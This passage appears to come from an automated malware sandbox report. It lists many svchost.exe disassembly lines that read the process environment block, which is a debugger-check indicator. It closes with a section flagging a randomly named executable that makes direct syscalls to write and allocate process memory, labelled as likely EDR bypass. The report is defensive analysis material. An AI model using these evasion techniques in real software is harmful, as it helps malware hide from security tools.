            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6E5CF mov eax, dword ptr fs:[00000030h]1_2_02E6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6E5CF mov eax, dword ptr fs:[00000030h]1_2_02E6E5CF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E365D0 mov eax, dword ptr fs:[00000030h]1_2_02E365D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6A5D0 mov eax, dword ptr fs:[00000030h]1_2_02E6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6A5D0 mov eax, dword ptr fs:[00000030h]1_2_02E6A5D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB05A7 mov eax, dword ptr fs:[00000030h]1_2_02EB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB05A7 mov eax, dword ptr fs:[00000030h]1_2_02EB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB05A7 mov eax, dword ptr fs:[00000030h]1_2_02EB05A7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E545B1 mov eax, dword ptr fs:[00000030h]1_2_02E545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E545B1 mov eax, dword ptr fs:[00000030h]1_2_02E545B1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E32582 mov eax, dword ptr fs:[00000030h]1_2_02E32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E32582 mov ecx, dword ptr fs:[00000030h]1_2_02E32582
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E64588 mov eax, dword ptr fs:[00000030h]1_2_02E64588
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6E59C mov eax, dword ptr fs:[00000030h]1_2_02E6E59C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6656A mov eax, dword ptr fs:[00000030h]1_2_02E6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6656A mov eax, dword ptr fs:[00000030h]1_2_02E6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6656A mov eax, dword ptr fs:[00000030h]1_2_02E6656A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E38550 mov eax, dword ptr fs:[00000030h]1_2_02E38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E38550 mov eax, dword ptr fs:[00000030h]1_2_02E38550
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E40535 mov eax, dword ptr fs:[00000030h]1_2_02E40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E40535 mov eax, dword ptr fs:[00000030h]1_2_02E40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E40535 mov eax, dword ptr fs:[00000030h]1_2_02E40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E40535 mov eax, dword ptr fs:[00000030h]1_2_02E40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E40535 mov eax, dword ptr fs:[00000030h]1_2_02E40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E40535 mov eax, dword ptr fs:[00000030h]1_2_02E40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5E53E mov eax, dword ptr fs:[00000030h]1_2_02E5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5E53E mov eax, dword ptr fs:[00000030h]1_2_02E5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5E53E mov eax, dword ptr fs:[00000030h]1_2_02E5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5E53E mov eax, dword ptr fs:[00000030h]1_2_02E5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5E53E mov eax, dword ptr fs:[00000030h]1_2_02E5E53E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EC6500 mov eax, dword ptr fs:[00000030h]1_2_02EC6500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F04500 mov eax, dword ptr fs:[00000030h]1_2_02F04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F04500 mov eax, dword ptr fs:[00000030h]1_2_02F04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F04500 mov eax, dword ptr fs:[00000030h]1_2_02F04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F04500 mov eax, dword ptr fs:[00000030h]1_2_02F04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F04500 mov eax, dword ptr fs:[00000030h]1_2_02F04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F04500 mov eax, dword ptr fs:[00000030h]1_2_02F04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F04500 mov eax, dword ptr fs:[00000030h]1_2_02F04500
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6AAEE mov eax, dword ptr fs:[00000030h]1_2_02E6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6AAEE mov eax, dword ptr fs:[00000030h]1_2_02E6AAEE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E86ACC mov eax, dword ptr fs:[00000030h]1_2_02E86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E86ACC mov eax, dword ptr fs:[00000030h]1_2_02E86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E86ACC mov eax, dword ptr fs:[00000030h]1_2_02E86ACC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E30AD0 mov eax, dword ptr fs:[00000030h]1_2_02E30AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E64AD0 mov eax, dword ptr fs:[00000030h]1_2_02E64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E64AD0 mov eax, dword ptr fs:[00000030h]1_2_02E64AD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E38AA0 mov eax, dword ptr fs:[00000030h]1_2_02E38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E38AA0 mov eax, dword ptr fs:[00000030h]1_2_02E38AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E86AA4 mov eax, dword ptr fs:[00000030h]1_2_02E86AA4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3EA80 mov eax, dword ptr fs:[00000030h]1_2_02E3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3EA80 mov eax, dword ptr fs:[00000030h]1_2_02E3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3EA80 mov eax, dword ptr fs:[00000030h]1_2_02E3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3EA80 mov eax, dword ptr fs:[00000030h]1_2_02E3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3EA80 mov eax, dword ptr fs:[00000030h]1_2_02E3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3EA80 mov eax, dword ptr fs:[00000030h]1_2_02E3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3EA80 mov eax, dword ptr fs:[00000030h]1_2_02E3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3EA80 mov eax, dword ptr fs:[00000030h]1_2_02E3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3EA80 mov eax, dword ptr fs:[00000030h]1_2_02E3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F04A80 mov eax, dword ptr fs:[00000030h]1_2_02F04A80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E68A90 mov edx, dword ptr fs:[00000030h]1_2_02E68A90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6CA6F mov eax, dword ptr fs:[00000030h]1_2_02E6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6CA6F mov eax, dword ptr fs:[00000030h]1_2_02E6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6CA6F mov eax, dword ptr fs:[00000030h]1_2_02E6CA6F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDEA60 mov eax, dword ptr fs:[00000030h]1_2_02EDEA60
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EACA72 mov eax, dword ptr fs:[00000030h]1_2_02EACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EACA72 mov eax, dword ptr fs:[00000030h]1_2_02EACA72
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E36A50 mov eax, dword ptr fs:[00000030h]1_2_02E36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E36A50 mov eax, dword ptr fs:[00000030h]1_2_02E36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E36A50 mov eax, dword ptr fs:[00000030h]1_2_02E36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E36A50 mov eax, dword ptr fs:[00000030h]1_2_02E36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E36A50 mov eax, dword ptr fs:[00000030h]1_2_02E36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E36A50 mov eax, dword ptr fs:[00000030h]1_2_02E36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E36A50 mov eax, dword ptr fs:[00000030h]1_2_02E36A50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E40A5B mov eax, dword ptr fs:[00000030h]1_2_02E40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E40A5B mov eax, dword ptr fs:[00000030h]1_2_02E40A5B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6CA24 mov eax, dword ptr fs:[00000030h]1_2_02E6CA24
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5EA2E mov eax, dword ptr fs:[00000030h]1_2_02E5EA2E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E54A35 mov eax, dword ptr fs:[00000030h]1_2_02E54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E54A35 mov eax, dword ptr fs:[00000030h]1_2_02E54A35
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EBCA11 mov eax, dword ptr fs:[00000030h]1_2_02EBCA11
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E38BF0 mov eax, dword ptr fs:[00000030h]1_2_02E38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E38BF0 mov eax, dword ptr fs:[00000030h]1_2_02E38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E38BF0 mov eax, dword ptr fs:[00000030h]1_2_02E38BF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5EBFC mov eax, dword ptr fs:[00000030h]1_2_02E5EBFC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EBCBF0 mov eax, dword ptr fs:[00000030h]1_2_02EBCBF0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E50BCB mov eax, dword ptr fs:[00000030h]1_2_02E50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E50BCB mov eax, dword ptr fs:[00000030h]1_2_02E50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E50BCB mov eax, dword ptr fs:[00000030h]1_2_02E50BCB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E30BCD mov eax, dword ptr fs:[00000030h]1_2_02E30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E30BCD mov eax, dword ptr fs:[00000030h]1_2_02E30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E30BCD mov eax, dword ptr fs:[00000030h]1_2_02E30BCD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDEBD0 mov eax, dword ptr fs:[00000030h]1_2_02EDEBD0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E40BBE mov eax, dword ptr fs:[00000030h]1_2_02E40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E40BBE mov eax, dword ptr fs:[00000030h]1_2_02E40BBE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E2CB7E mov eax, dword ptr fs:[00000030h]1_2_02E2CB7E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EC6B40 mov eax, dword ptr fs:[00000030h]1_2_02EC6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EC6B40 mov eax, dword ptr fs:[00000030h]1_2_02EC6B40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EFAB40 mov eax, dword ptr fs:[00000030h]1_2_02EFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02ED8B42 mov eax, dword ptr fs:[00000030h]1_2_02ED8B42
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDEB50 mov eax, dword ptr fs:[00000030h]1_2_02EDEB50
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5EB20 mov eax, dword ptr fs:[00000030h]1_2_02E5EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5EB20 mov eax, dword ptr fs:[00000030h]1_2_02E5EB20
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EF8B28 mov eax, dword ptr fs:[00000030h]1_2_02EF8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EF8B28 mov eax, dword ptr fs:[00000030h]1_2_02EF8B28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EAEB1D mov eax, dword ptr fs:[00000030h]1_2_02EAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EAEB1D mov eax, dword ptr fs:[00000030h]1_2_02EAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EAEB1D mov eax, dword ptr fs:[00000030h]1_2_02EAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EAEB1D mov eax, dword ptr fs:[00000030h]1_2_02EAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EAEB1D mov eax, dword ptr fs:[00000030h]1_2_02EAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EAEB1D mov eax, dword ptr fs:[00000030h]1_2_02EAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EAEB1D mov eax, dword ptr fs:[00000030h]1_2_02EAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EAEB1D mov eax, dword ptr fs:[00000030h]1_2_02EAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EAEB1D mov eax, dword ptr fs:[00000030h]1_2_02EAEB1D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EFA8E4 mov eax, dword ptr fs:[00000030h]1_2_02EFA8E4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6C8F9 mov eax, dword ptr fs:[00000030h]1_2_02E6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6C8F9 mov eax, dword ptr fs:[00000030h]1_2_02E6C8F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5E8C0 mov eax, dword ptr fs:[00000030h]1_2_02E5E8C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E30887 mov eax, dword ptr fs:[00000030h]1_2_02E30887
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EBC89D mov eax, dword ptr fs:[00000030h]1_2_02EBC89D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EBE872 mov eax, dword ptr fs:[00000030h]1_2_02EBE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EBE872 mov eax, dword ptr fs:[00000030h]1_2_02EBE872
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EC6870 mov eax, dword ptr fs:[00000030h]1_2_02EC6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EC6870 mov eax, dword ptr fs:[00000030h]1_2_02EC6870
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E42840 mov ecx, dword ptr fs:[00000030h]1_2_02E42840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E60854 mov eax, dword ptr fs:[00000030h]1_2_02E60854
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E34859 mov eax, dword ptr fs:[00000030h]1_2_02E34859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E34859 mov eax, dword ptr fs:[00000030h]1_2_02E34859
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E52835 mov eax, dword ptr fs:[00000030h]1_2_02E52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E52835 mov eax, dword ptr fs:[00000030h]1_2_02E52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E52835 mov eax, dword ptr fs:[00000030h]1_2_02E52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E52835 mov ecx, dword ptr fs:[00000030h]1_2_02E52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E52835 mov eax, dword ptr fs:[00000030h]1_2_02E52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E52835 mov eax, dword ptr fs:[00000030h]1_2_02E52835
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E6A830 mov eax, dword ptr fs:[00000030h]1_2_02E6A830
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02ED483A mov eax, dword ptr fs:[00000030h]1_2_02ED483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02ED483A mov eax, dword ptr fs:[00000030h]1_2_02ED483A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EBC810 mov eax, dword ptr fs:[00000030h]1_2_02EBC810
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EBE9E0 mov eax, dword ptr fs:[00000030h]1_2_02EBE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E629F9 mov eax, dword ptr fs:[00000030h]1_2_02E629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E629F9 mov eax, dword ptr fs:[00000030h]1_2_02E629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EC69C0 mov eax, dword ptr fs:[00000030h]1_2_02EC69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02E3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02E3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02E3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02E3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02E3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E3A9D0 mov eax, dword ptr fs:[00000030h]1_2_02E3A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E649D0 mov eax, dword ptr fs:[00000030h]1_2_02E649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EFA9D3 mov eax, dword ptr fs:[00000030h]1_2_02EFA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E429A0 mov eax, dword ptr fs:[00000030h]1_2_02E429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E429A0 mov eax, dword ptr fs:[00000030h]1_2_02E429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E429A0 mov eax, dword ptr fs:[00000030h]1_2_02E429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E429A0 mov eax, dword ptr fs:[00000030h]1_2_02E429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E429A0 mov eax, dword ptr fs:[00000030h]1_2_02E429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E429A0 mov eax, dword ptr fs:[00000030h]1_2_02E429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E429A0 mov eax, dword ptr fs:[00000030h]1_2_02E429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E429A0 mov eax, dword ptr fs:[00000030h]1_2_02E429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E429A0 mov eax, dword ptr fs:[00000030h]1_2_02E429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E429A0 mov eax, dword ptr fs:[00000030h]1_2_02E429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E429A0 mov eax, dword ptr fs:[00000030h]1_2_02E429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E429A0 mov eax, dword ptr fs:[00000030h]1_2_02E429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E429A0 mov eax, dword ptr fs:[00000030h]1_2_02E429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E309AD mov eax, dword ptr fs:[00000030h]1_2_02E309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E309AD mov eax, dword ptr fs:[00000030h]1_2_02E309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB89B3 mov esi, dword ptr fs:[00000030h]1_2_02EB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB89B3 mov eax, dword ptr fs:[00000030h]1_2_02EB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB89B3 mov eax, dword ptr fs:[00000030h]1_2_02EB89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E56962 mov eax, dword ptr fs:[00000030h]1_2_02E56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E56962 mov eax, dword ptr fs:[00000030h]1_2_02E56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E56962 mov eax, dword ptr fs:[00000030h]1_2_02E56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E7096E mov eax, dword ptr fs:[00000030h]1_2_02E7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E7096E mov edx, dword ptr fs:[00000030h]1_2_02E7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E7096E mov eax, dword ptr fs:[00000030h]1_2_02E7096E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02ED4978 mov eax, dword ptr fs:[00000030h]1_2_02ED4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02ED4978 mov eax, dword ptr fs:[00000030h]1_2_02ED4978
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EBC97C mov eax, dword ptr fs:[00000030h]1_2_02EBC97C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB0946 mov eax, dword ptr fs:[00000030h]1_2_02EB0946
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB892A mov eax, dword ptr fs:[00000030h]1_2_02EB892A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EC892B mov eax, dword ptr fs:[00000030h]1_2_02EC892B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EAE908 mov eax, dword ptr fs:[00000030h]1_2_02EAE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EAE908 mov eax, dword ptr fs:[00000030h]1_2_02EAE908
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EBC912 mov eax, dword ptr fs:[00000030h]1_2_02EBC912
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E28918 mov eax, dword ptr fs:[00000030h]1_2_02E28918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E28918 mov eax, dword ptr fs:[00000030h]1_2_02E28918
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E36EE0 mov eax, dword ptr fs:[00000030h]1_2_02E36EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E36EE0 mov eax, dword ptr fs:[00000030h]1_2_02E36EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E36EE0 mov eax, dword ptr fs:[00000030h]1_2_02E36EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E36EE0 mov eax, dword ptr fs:[00000030h]1_2_02E36EE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E68EF5 mov eax, dword ptr fs:[00000030h]1_2_02E68EF5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EBCEA0 mov eax, dword ptr fs:[00000030h]1_2_02EBCEA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EBCEA0 mov eax, dword ptr fs:[00000030h]1_2_02EBCEA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EBCEA0 mov eax, dword ptr fs:[00000030h]1_2_02EBCEA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02ECAEB0 mov eax, dword ptr fs:[00000030h]1_2_02ECAEB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02ECAEB0 mov eax, dword ptr fs:[00000030h]1_2_02ECAEB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E2AE90 mov eax, dword ptr fs:[00000030h]1_2_02E2AE90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E2AE90 mov eax, dword ptr fs:[00000030h]1_2_02E2AE90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E2AE90 mov eax, dword ptr fs:[00000030h]1_2_02E2AE90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E62E9C mov eax, dword ptr fs:[00000030h]1_2_02E62E9C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E62E9C mov ecx, dword ptr fs:[00000030h]1_2_02E62E9C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E36E71 mov eax, dword ptr fs:[00000030h]1_2_02E36E71
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB0E7F mov eax, dword ptr fs:[00000030h]1_2_02EB0E7F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB0E7F mov eax, dword ptr fs:[00000030h]1_2_02EB0E7F

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeNtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
            Source: C:\Program Files (x86)\HBeYDbubOyqoARpYdxoNzPaqubIpqJxiZQYxmndjKe\eKxwLXHhqpgy.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
